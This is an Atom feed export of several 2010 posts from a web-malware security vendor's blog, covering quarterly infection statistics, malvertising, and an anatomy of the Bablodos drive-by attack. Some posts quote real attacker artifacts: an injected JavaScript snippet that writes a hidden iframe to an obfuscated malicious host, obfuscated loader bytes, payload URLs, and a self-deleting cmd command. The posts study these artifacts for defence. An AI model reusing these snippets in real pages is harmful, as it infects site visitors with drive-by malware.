Companies can use &lt;a href="http://wam.dasient.com/wam/products_monitoring" id="fxjt" title="Dasient's Web Anti-Malware service"&gt;Dasient's Web Anti-Malware (WAM) monitoring service&lt;/a&gt; to defend their websites against the prospect of third-party widgets getting infected with malware.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-5985537869977101432?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/5985537869977101432/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2010/06/third-party-javascript-widget.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/5985537869977101432'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/5985537869977101432'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2010/06/third-party-javascript-widget.html' title='Third-party JavaScript widget discovered to be infected with malware'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-7271998963230725943</id><published>2010-05-10T14:48:00.000-07:00</published><updated>2010-05-10T16:09:58.068-07:00</updated><title type='text'>Q1'10 web-based malware data and trends</title><content type='html'>Each quarter we pull together data for web-based malware attacks from across the web. 
Our proprietary malware analysis platform allows us to monitor millions of websites and draw results from a wealth of data which we summarize in this blog. What we continue to see is that the web malware threat continues to grow significantly. Hackers are becoming increasingly sophisticated and bold in their attacks, which means that legitimate websites are more threatened than ever. Putting web site security best practices in place such as malware monitoring and containment is becoming an absolute must if businesses do not want to expose themselves and their customers to these attacks. A particularly interesting observation has been an increase in 'malvertising' attacks in which hackers plant malicious ads on high-profile ad networks and websites.  We'll dig deeper into that but first, let's take a look at some of our results:&lt;br /&gt;&lt;br /&gt;&lt;u&gt;The Q1 2010 Data&lt;br /&gt;&lt;br /&gt;&lt;/u&gt;In Q1 2010, we estimate that over 720,000 web sites were infected. While this number is significantly higher than our previous estimate of 560,000 infected web sites during Q4 2009, we also improved our methodology based on new telemetry from scanning a larger number of sites on the Internet and that accounts for infected sites that were previously not included.&lt;br /&gt;&lt;br /&gt;This number does not only include small to medium sites getting infected, but also larger, high-profile websites (including Fortune 500 companies). Larger sites are desirable targets because of their high volume of traffic. It's much more convenient for an attacker to compromise an existing site than to try and build web traffic to a site they set up from scratch.&lt;br /&gt;&lt;br /&gt;The challenge for websites is that there are many different ways for them to get infected. 
For example, a site that uses a JavaScript widget that is hosted externally could be at risk of getting compromised with web-based malware, as discussed in a &lt;a href="http://www.usenix.org/events/hotbots07/tech/full_papers/provos/provos.pdf" id="bs8g" title="Google report"&gt;Google report&lt;/a&gt;. Or publishers, blogs and other content providers that use third-party ad networks are at risk of having malvertisements introduced to their users on their site. Many sites (large and small) also rely on third parties to provide packaged software that powers applications on their website. Examples include content management systems, blogging software, web server software, etc. It is often difficult for websites to constantly keep the software running their site up-to-date and patched to the latest version.  Keeping server-side web applications up-to-date is just as or even more challenging than keeping client-side software up-to-date and patched.  Even patched applications have vulnerabilities, which emphasizes the need for malware monitoring to mitigate risk due to both known and unknown vulnerabilities in web applications. In fact, in April there was &lt;a href="http://www.informationweek.com/blog/main/archives/2010/04/network_solutio.html" id="nomr" title="a mass attack on Wordpress"&gt;a mass attack on WordPress&lt;/a&gt; where attackers exploited a vulnerability to infect thousands of websites with malware.&lt;br /&gt;&lt;br /&gt;As part of our quarterly malware update, we performed a study of a large pool of websites where we identified the risk factors on those sites that may contribute to malware infections. The results were surprising. We found that 97% of Fortune 500 web sites are at a high risk of getting infected with malware due to external partners (such as JavaScript widget providers, ad networks, and/or packaged software providers).  
In fact, Fortune 500 web sites have such a high risk because 69% of them use external JavaScript to render portions of their sites and 64% of them are running outdated web applications.  (We will be publishing a more in-depth study of malware-specific vulnerabilities on websites in the future.)&lt;br /&gt;&lt;br /&gt;On a side note: We launched a new service in Q1 called the &lt;a href="http://wam.dasient.com/wam/evaluation?so=13" id="haa7" title="Dasient Malware Risk Assessment"&gt;Dasient Malware Risk Assessment&lt;/a&gt;, which allows us to run risk profiles on our customers, giving them information on where they are most exposed to web malware. We obtained the above-mentioned results by running our Malware Risk Assessment on a significant number of industry-specific web sites. If any of you are interested in running such an assessment on your web site, please fill in the form and we'll get you started.&lt;span style="font-size:78%;"&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div&gt;Getting back to our statistics: reinfection rates decreased slightly from 42.4% to 40.5%, although, in general, the probability that a web site will get re-infected is still very high. And, of course, higher re-infection rates mean the site has a higher likelihood of suffering from loss of traffic, a decline in revenue, and damage to brand equity.&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The average number of processes that infected web sites start on compromised machines is 3.03 (up from 2.8). 
Although a little higher than last quarter, this is still indicative to us that attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine; historically, attackers have started up to a dozen or more new processes on machines they compromise.&lt;br /&gt;23.8% of new processes started due to drive-by-downloads had one-character filenames such as “a.exe” or “f.exe”.&lt;br /&gt;&lt;br /&gt;&lt;div id="j6ns" style="text-align: left;"&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_296cdn2q3c6_b" style="height: 320px; width: 450px;" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Attackers prefer to use “.com” domains to host malware.  “.com” was the most popular, followed by “.cn”.  The domain “&lt;a href="http://dnparking.com/" target="_blank"&gt;dnparking.com&lt;/a&gt;” was an attacker site used to infect a relatively large number of sites early in the quarter.&lt;br /&gt;&lt;br /&gt;&lt;div id="s0ky" style="text-align: left;"&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_297c2hxqdct_b" style="height: 313px; width: 375px;" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;ASP, HTML, and PHP pages were the most infected, in that order.  
The combined number of ASP and PHP pages infected shows an increase in dynamic content being infected this quarter, which once again emphasizes the growing complexity of web sites and web applications.&lt;br /&gt;&lt;br /&gt;&lt;div id="yjvm" style="text-align: left;"&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_293fzqz42fd_b" style="height: 318px; width: 337px;" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;u&gt;Uptick in malvertising attacks in Q1&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;One of the major trends observed is the spike in malvertising attacks since the beginning of 2010.&lt;br /&gt;While content- and feature-rich advertisements have been used on the web for some time, attackers are investing more in using them as a channel to distribute drive-by malware downloads.&lt;br /&gt;&lt;br /&gt;Viruses and other malware were found to be lurking in ads on high-profile sites like &lt;a href="http://news.cnet.com/8301-27080_3-10353402-245.html" title="Ads--the new malware delivery format -- Tuesday, Sep 15, 2009"&gt;The New York Times&lt;/a&gt;, &lt;a href="http://news.cnet.com/8301-27080_3-10466044-245.html" title="Drudge  Report accused of serving malware, again -- Tuesday, Mar 9, 2010"&gt;DrudgeReport.com&lt;/a&gt;, &lt;a href="http://news.cnet.com/8301-27080_3-20000353-245.html" title="When  malware strikes via bad ads on good sites -- Friday, Mar 12, 2010"&gt;TechCrunch&lt;/a&gt; and &lt;a href="http://news.cnet.com/8301-27080_3-10466753-245.html" title="WhitePages.com halts ad networks over malware -- Wednesday, Mar  10, 2010"&gt;WhitePages.com&lt;/a&gt;, as well as in ads served by big ad delivery platforms such as &lt;a href="http://news.cnet.com/8301-27080_3-20000898-245.html" id="wcv:" title="Yahoo, Fox and Google"&gt;Yahoo, Fox and Google&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;We thought it may be useful to describe how malvertising attacks work, in general.  
In a typical attack, the hacker signs up to place an ad on a victim ad network (often using a stolen credit card), or compromises the credentials of an existing advertiser on an ad network. If the attacker signs up for a new account with an ad network, the attacker often places a legitimate-looking ad first, and switches it for a malicious ad once the attacker "gains trust" with the ad network.  As some ad networks have stricter policies and/or vetting processes around the posting of ads for relatively new advertisers, some attackers simply compromise the login credentials of already existing, legitimate advertisers. &lt;br /&gt;&lt;br /&gt;Given that so much of the web is monetized via advertising streams, it is a wonder that malvertising attacks aren't worse than they are, and the malvertising attacks over the past few weeks could be a harbinger of the growing threat to online advertising commerce.&lt;br /&gt;&lt;br /&gt;Now that we have discussed high-level trends from the update, let's take a closer look at what the malware does once it is downloaded to a user's PC.&lt;br /&gt;&lt;br /&gt;&lt;u&gt;What is the Malware doing?&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;In many cases, the malware was trying to join a botnet. Botnets are networks of PCs, which have been taken over by malware programs. What the botnet will end up doing depends on what the botnet 'master' wants it to do but usually it will hook processes to capture keystrokes, send email spam etc. Some of the more common mechanisms to conduct drive-by-downloads included taking advantage of Adobe PDF exploits, and encouraging users to click on socially engineered fake AV windows to initiate dangerous downloads. In particular the 'Zeus' botnet has become very widely spread. Netwitness, based in Herndon, VA, released a &lt;a title="report highlighting the kind of havoc the malware can wreak." 
href="http://www.netwitness.com/resources/pressreleases/feb182010.aspx" id="f05g"&gt;report highlighting the kind of havoc the malware can wreak.&lt;/a&gt; It documents a Zeus botnet that controlled nearly 75,000 computers in more than 2,400 organizations, including some large and reputable ones such as Merck, Juniper Networks and the Hollywood studio Paramount Pictures. Over four weeks, the botnet was used to steal more than 68,000 log-in credentials, including thousands of Facebook log-ins and Yahoo email log-ins.&lt;br /&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;Another interesting observation from our research is how attackers interact with government web sites.&lt;br /&gt;&lt;u&gt;&lt;br /&gt;Cybercriminals not interested in cyberwar (yet?)&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;Attackers use automated scripts to query search engines to get lists of vulnerable sites, and then have their scripts automatically infect those sites. Their scripts are typically not very discriminating about which sites they attack.  Government-run web sites, for instance, are also likely to be attacked by these automated scripts.  For example, last month a part of the Environmental Protection Agency's (EPA) web site was infected, and in May the &lt;a href="http://online.wsj.com/article/BT-CO-20100504-708466.html?mod=WSJ_latestheadlines" id="p0lt" title="US Treasury had three of its web sites hacked"&gt;US Treasury had three of its web sites hacked&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;It seems, though, that the attackers conducting such attacks are purely in it for the money.  One might imagine that inadvertently attacking certain government web sites might provoke a serious (even military) reaction.  Hence, while the attackers want to distribute their malware for fun and profit, they want to stay away from starting an all-out cyberwar.  Why do we say that?  
In some of the attacks that we track, we have seen JavaScript code such as the following, which attackers inject:&lt;br /&gt;&lt;br /&gt;&lt;code style="font-size: 12px;"&gt;&lt;span style="color:blue"&gt;if &lt;/span&gt;&lt;span style="color:gray"&gt;(&lt;/span&gt;&lt;span style="color:black"&gt;document.location.href.indexOf&lt;/span&gt;&lt;span style="color:gray"&gt;(&lt;/span&gt;&lt;span style="color:red"&gt;&amp;quot;gov&amp;quot;&lt;/span&gt;&lt;span style="color:gray"&gt;) &amp;gt;= &lt;/span&gt;&lt;span style="color:black"&gt;0&lt;/span&gt;&lt;span style="color:gray"&gt;) &lt;/span&gt;&lt;span style="color:black"&gt;{&lt;br&gt;} &lt;/span&gt;&lt;span style="color:blue"&gt;else &lt;/span&gt;&lt;span style="color:black"&gt;{&lt;br&gt;&amp;nbsp;&amp;nbsp;document.write&lt;/span&gt;&lt;span style="color:gray"&gt;(&lt;/span&gt;&lt;span style="color:red"&gt;&amp;quot;&amp;lt;div style=&amp;quot;&lt;/span&gt;&lt;span style="color:darkred"&gt;'display:none'&lt;/span&gt;&lt;span style="color:red"&gt;&amp;quot;&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style="color:gray"&gt;);&lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color:black"&gt;document.write&lt;/span&gt;&lt;span style="color:gray"&gt;(&lt;/span&gt;&lt;span style="color:black"&gt;unescape&lt;/span&gt;&lt;span style="color:gray"&gt;(&lt;/span&gt;&lt;span style="color:darkred"&gt;'%3Ciframe%20src%3Dhttp%3A//%6B%6F%74%73%2E%39%39%36%36%2E%6F%72%67:%39%37/%78%6F/%64%6B.html%20width=100%20height=0%3E%3C/iframe%3E'&lt;/span&gt;&lt;span style="color:gray"&gt;));&lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color:black"&gt;document.write&lt;/span&gt;&lt;span style="color:gray"&gt;(&lt;/span&gt;&lt;span style="color:red"&gt;&amp;quot;&amp;lt;/div&amp;gt;&amp;quot;&lt;/span&gt;&lt;span style="color:gray"&gt;);&lt;br&gt;&lt;/span&gt;&lt;span style="color:black"&gt;}&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;Basically, the code above says that if the web site attacked is a government web 
site, then DO NOT serve a malware drive-by-download. Otherwise, it happily generates an invisible frame on the page that pulls in malicious content, which initiates a drive-by-download. What is interesting here is that while an attacker's script may automatically inject the code above into any website, the code is careful not to serve malware to visitors of government sites (including government employees), as doing so could be interpreted as an act of cyberwar.  What is also interesting is that the attackers could decide to launch a cyberwar at any time.&lt;br /&gt;&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;Summary&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Based on our research, it is&lt;span&gt;&lt;span style="background-color: rgb(255, 255, 255);"&gt; evident that the malware epidemic is growing rapidly. With cybercrime techniques getting more sophisticated every day, it is critical to educate businesses on how they can put sound security practices in place for their websites to protect their customers and their revenues. In order to make sure that their businesses are not exposed, site owners can mitigate their risk by monitoring their websites for malware regularly.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you're a business owner and you'd like to learn more about how &lt;a href="http://wam.dasient.com/wam/products_monitoring"&gt;Dasient WAM&lt;/a&gt; can help protect your websites, &lt;a href="http://www.dasient.com/" id="c5k1" title="head here"&gt;head here&lt;/a&gt;. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out &lt;a href="http://wam.dasient.com/wam/partners"&gt;this page&lt;/a&gt;. 
And no matter who you are, please be sure to check out &lt;a href="http://twitter.com/dasient"&gt;our Twitter feed&lt;/a&gt; for all the latest in web-based malware and general security news.&lt;br /&gt;&lt;br /&gt;Keep your sites safe!&lt;br /&gt;Your Dasient Team&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-7271998963230725943?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/7271998963230725943/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2010/05/q110-web-based-malware-data-and-trends.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/7271998963230725943'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/7271998963230725943'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2010/05/q110-web-based-malware-data-and-trends.html' title='Q1&apos;10 web-based malware data and trends'/><author><name>Ariana</name><uri>http://www.blogger.com/profile/11144728625850193785</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17055172410883886117'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-894406914005441019</id><published>2010-03-03T16:34:00.000-08:00</published><updated>2010-03-03T17:36:13.697-08:00</updated><title type='text'>Anatomy of the Bablodos drive-by-download attack</title><content type='html'>Hackers have come to rely less on distributing malware via email attachments, and have opted for infecting legitimate websites with drive-by-downloads as the de facto way of more 
aggressive distribution.  Just by loading an infected web page in a browser, a virus can be downloaded to a computer without the user's knowledge. The implications are often disastrous and range from reputation/brand and revenue loss to data theft.&lt;br /&gt;&lt;br /&gt;One particular attack stood out due to the number of exploits it used and the number of processes it started -- it was quite "blatant". While hackers often take steps to evade detection, Bablodos didn't seem to bother.  Based on Dasient's last &lt;a href="http://blog.dasient.com/2010/01/q409-web-based-malware-data-and-trends.html"&gt;malware report&lt;/a&gt; for 2009, the average number of extra processes initiated by hackers in Q4 '09 was just 2.8 -- enough for a downloader and perhaps one or two pieces of malware. (As a comparison, in previous years, a drive-by download would often initiate 10 or more extra processes, ostensibly in an attempt to maximize the return from each infected endpoint.) This shows us that attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine in exchange for a greater likelihood of evading detection.&lt;br /&gt;&lt;br /&gt;Enter &lt;a href="http://wam.dasient.com/wam/infection_library?md5=af5783963daf670c1d236a0301809c7a"&gt;bablodos.com&lt;/a&gt;. This brazen attack took advantage of a large number of different vulnerabilities on the user's computer, modified personal firewall settings and then deleted itself off the disk 5 seconds after starting as many as 8 processes. Obviously it wasn't trying to hide anything, and the goal was to cause as much damage as possible in a short amount of time. &lt;br /&gt;Clearly, some of today's hackers aren't afraid of being detected. 
&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt; So how exactly does this attack work? &lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;b&gt;STEP 1&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Bablodos .com infects vulnerable sites by injecting obfuscated JavaScript code into their web pages.&lt;br /&gt;&lt;br /&gt;Here are the first few bytes of the malicious JS snippet: "document.write(String.fromCharCode(60,116,97,98,108,101,32,98,111,114,100..."&lt;br /&gt;&lt;br /&gt;This JS code sources in&lt;br /&gt;&lt;br /&gt;bablodos .com/x/jar.jar&lt;br /&gt;bablodos .com/counter/swf.swf&lt;br /&gt;bablodos .com/counter/exe.php&lt;br /&gt;bablodos .com/counter/pdf.php&lt;br /&gt;&lt;br /&gt;to probe for vulnerabilities in the Flash and PDF plug-ins and the Java Runtime Environment.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;STEP 2&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Users visiting these victim sites get infected in the following way:&lt;br /&gt;&lt;br /&gt;* An executable named file.exe is downloaded into the \Documents and Settings\%USER% folder, and run without the user's consent. 
It is classified as a downloader by many antivirus engines according to this &lt;a href="http://www.virustotal.com/analisis/f4dac1ba3b92c8206d91b5ec5d05126c7edd154a878367bf0638ec7aea631aa4-1265187986"&gt;VirusTotal analysis&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;* This executable bypasses the Windows Firewall by modifying the following registry key:&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List&lt;br /&gt;&lt;br /&gt;* Then it downloads additional malware into the temp folder and starts as many as 8 new processes, with file names comprised of 10 random characters such as&lt;br /&gt;SUHyAwDJUT.exe, AJvvOxjPBD.exe, YylDMSreSn.exe, etc.&lt;br /&gt;&lt;br /&gt;* To avoid detection, the downloaded malware is deleted from disk after it starts executing, using the command:&lt;br /&gt;C:\WINDOWS\system32\cmd.exe /c timeout 5 &amp;amp;&amp;amp; del %TEMP%\[10chars].exe&lt;br /&gt;&lt;br /&gt;Since January of this year at least 50 sites have been hit by bablodos.com.&lt;br /&gt;&lt;br /&gt;Had these sites been monitored by &lt;a href="http://wam.dasient.com/wam/products_overview"&gt;Dasient WAM&lt;/a&gt;, they would have been alerted in real time that the malware was on their site and they would have been able to contain the infection and prevent it from spreading.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-894406914005441019?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/894406914005441019/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2010/03/anatomy-of-bablodos-drive-by-download.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/894406914005441019'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/894406914005441019'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2010/03/anatomy-of-bablodos-drive-by-download.html' title='Anatomy of the Bablodos drive-by-download attack'/><author><name>Tufan 
Demir</name><uri>http://www.blogger.com/profile/15089335541005713334</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='13582527292670006697'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-3431236566027000310</id><published>2010-01-26T08:00:00.000-08:00</published><updated>2010-01-26T16:11:54.042-08:00</updated><title type='text'>Q4'09 web-based malware data and trends</title><content type='html'>Ed. Note: The data in this post is drawn primarily from Dasient's proprietary malware analysis platform, which gathers data on web-based malware attacks from across the web, and in the last year has been used to help tens of thousands of site owners address their web-based malware issues.&lt;br /&gt;&lt;br /&gt;As we reported last quarter, the way malware is being distributed is undergoing a fundamental shift, with more attackers focusing on "drive-by downloads" from legitimate sites that have been compromised, or from sites designed specifically for malicious purposes. In nearly all the variations on this kind of attack, no user action is required for the infection to occur, beyond loading the site in a browser -- and there are very few signs that malicious code has been downloaded.&lt;br /&gt;&lt;br /&gt;There is perhaps no better illustration of this shift than the way malware was employed in the recent attack on Google and several other companies. One of the components of the attack involved spear-phishing one or more Google employees, with an aim of driving them to a site that then exploited a zero-day vulnerability in Internet Explorer 6 to download malware to those employees' computers. 
In previous years, such an attack would have solely made use of a malicious email attachment to compromise the target's computer; now, attackers are clearly opting to employ multiple vectors, including web-based methods.&lt;br /&gt;&lt;br /&gt;Looking at the data for Q4'09&lt;br /&gt;&lt;br /&gt;Based on the telemetry data we've gathered from the web, we estimate that more than 560,000 sites and approximately 5.5 million pages were infected in Q4'09, compared with more than 640,000 sites and 5.8 million pages in Q3'09. By the end of the year, we had identified more than 100,000 web-based malware infections.&lt;br /&gt;&lt;br /&gt;Also in Q4'09, the infections on newly compromised sites of 10 pages or more spread to an average of 24% of those sites' pages, up from 19 percent the previous quarter. This increase helps account for the smaller drop in the number of infected pages for the quarter, relative to the drop in infected sites. In other words, we saw a more significant drop in the number of infected sites than we did in the number of infected pages because each infection tended to spread to a larger number of pages on each site.&lt;br /&gt;&lt;br /&gt;Finally, we saw a reinfection rate of 42 percent for the quarter (compared with 39 percent in Q3'09), meaning that more than four of every 10 sites infected in the quarter were reinfected within a space of three months. And, of course, with each infection the site is likely to suffer a loss of traffic, a decline in revenue, and damage to brand equity.&lt;br /&gt;&lt;br /&gt;While we clearly saw a slight dip in some of the key metrics in the quarter (and, more specifically, as we neared the end of the year), the macro trend still points to a steady and significant increase in this kind of activity. 
To cite just one indicator: The number of infected pages for the quarter, 5.5 million, is a substantial increase from data published by Microsoft in April 2009, which pegged the number of infected pages per quarter at a little more than 3 million.&lt;br /&gt;&lt;br /&gt;Attackers getting smarter&lt;br /&gt;&lt;br /&gt;Like most other kinds of attackers, purveyors of web-based malware have long since adopted basic social engineering techniques to maximize their chances of remaining undetected as they infect endpoints. We saw plenty of evidence confirming that trend in Q4'09: For example, the most common domains being sourced in the download of a malicious file included innocuous-looking names like "google-query.com," "netlinkenterprises.com," and "starktourism.com." Similarly, the file names most often used in drive-by downloads included things like "setup.exe," "update.exe" (which was used in the Google attack), and "install_flash_player.exe."&lt;br /&gt;&lt;br /&gt;But we also saw some evidence that attackers are responding directly to industry efforts to curb the spread of web-based malware. One interesting example can be found in the average number of extra processes started when a drive-by download is initiated. In previous years, a drive-by download would often initiate 10 or more extra processes, ostensibly in an attempt to maximize the return from each infected endpoint. In response, the search providers and anti-virus vendors who scan the web for infected sites began using the number of extra processes initiated as a signal that the webpage might be malicious. But in Q4'09, the average number of extra processes initiated was just 2.8 -- enough for a downloader and perhaps one or two pieces of malware. 
Clearly, attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine in exchange for a greater likelihood of evading detection.&lt;br /&gt;&lt;br /&gt;Structural vulnerabilities still being exploited&lt;br /&gt;&lt;br /&gt;It stands to reason that the increasing complexity in and interoperability between websites and web applications has played a significant role in the rise of web-based malware. After all, the more dynamic and sophisticated your pages or applications are, the more vulnerabilities there will be for attackers to exploit. The data for Q4'09 certainly bears that out: .php, .asp, and .aspx (all file types associated with dynamic web content) accounted for 55 percent of all compromised URLs in the quarter.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://3.bp.blogspot.com/_VTOwWLvbLPY/S1740imgJvI/AAAAAAAACIk/Iz6yXV96uE8/s320/withDasientname.png" alt="" id="BLOGGER_PHOTO_ID_5431051782180579058" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 227px;" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Of course, a closer look at the data reveals that file types associated with static pages, such as .html, .htm, and .shtml, accounted for 39.6 percent of the compromised URLs for the quarter. This suggests that attackers are still focused in no small part on exploiting structural vulnerabilities in the web to compromise legitimate sites -- vulnerabilities like sourced-in third-party content or applications; user-added content like comments, links, photos, and other files; and syndicated ad networks, among other things. 
There are no simple solutions for closing these kinds of vulnerabilities, something that all site owners who want to avoid being infected -- and potentially infecting their users and being blacklisted -- should bear in mind when considering the protections they employ.&lt;br /&gt;&lt;br /&gt;Keeping your site safe&lt;br /&gt;&lt;br /&gt;If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed at http://twitter.com/dasient for all the latest in web-based malware and general security news.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-3431236566027000310?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/3431236566027000310/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2010/01/q409-web-based-malware-data-and-trends.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/3431236566027000310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/3431236566027000310'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2010/01/q409-web-based-malware-data-and-trends.html' title='Q4&apos;09 web-based malware data and trends'/><author><name>Tufan Demir</name><uri>http://www.blogger.com/profile/15089335541005713334</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='13582527292670006697'/></author><media:thumbnail 
xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VTOwWLvbLPY/S1740imgJvI/AAAAAAAACIk/Iz6yXV96uE8/s72-c/withDasientname.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-405197892972891734</id><published>2009-12-01T10:01:00.000-08:00</published><updated>2009-12-01T10:06:03.962-08:00</updated><title type='text'>Dasient WAM monitoring and diagnostic services now OOB</title><content type='html'>&lt;span class="Apple-style-span"   style="  ;font-family:Verdana;font-size:13px;"&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;Some of you may have already seen &lt;a href="http://wam.dasient.com/wam/about_pressreleases"&gt;our announcement&lt;/a&gt; earlier this morning, but for those of you who haven't: The Dasient Web Anti-Malware (WAM) monitoring and diagnostic services have graduated out of beta, and are now &lt;a href="http://wam.dasient.com/wam/products_overview"&gt;generally available&lt;/a&gt;. We've had an exciting few months since first launching these services, continuing to build out the scalability, reliability, and speed of our malware detection platform and proving its readiness with tens of thousands of beta customers. 
We're thrilled to be able to make these services generally available, so we can help even more businesses and site owners protect themselves from web-based malware.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;With the graduation out of beta, we'll be introducing some new features. They include richer reporting tools that will provide customers with data on the number of URLs scanned each week, lists of all URLs scanned and attacks being checked for, and the latest web-based malware attacks Dasient has detected. They also include new account management features that will enable customers using Dasient WAM to protect multiple domains to manage all those domains using a single login. 
